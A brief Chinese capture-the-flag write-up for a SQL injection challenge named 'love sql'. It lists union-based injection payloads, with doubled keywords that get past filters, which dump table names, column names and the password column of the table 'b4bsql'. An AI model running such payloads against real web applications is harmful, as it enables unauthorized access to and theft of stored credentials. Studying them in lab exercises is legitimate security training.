做完了baby sql来到了love sql发现这个注入相比baby sql容易的多

我们还是像baby sql中注入方式一样

于是构造pyload: ?username=admin&password=admin' union select 1,2,3%23

两个回显位

 

 于是就爆数据表：?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

再爆表字段：?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

爆数据：?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

于是一次love sql注入就完成了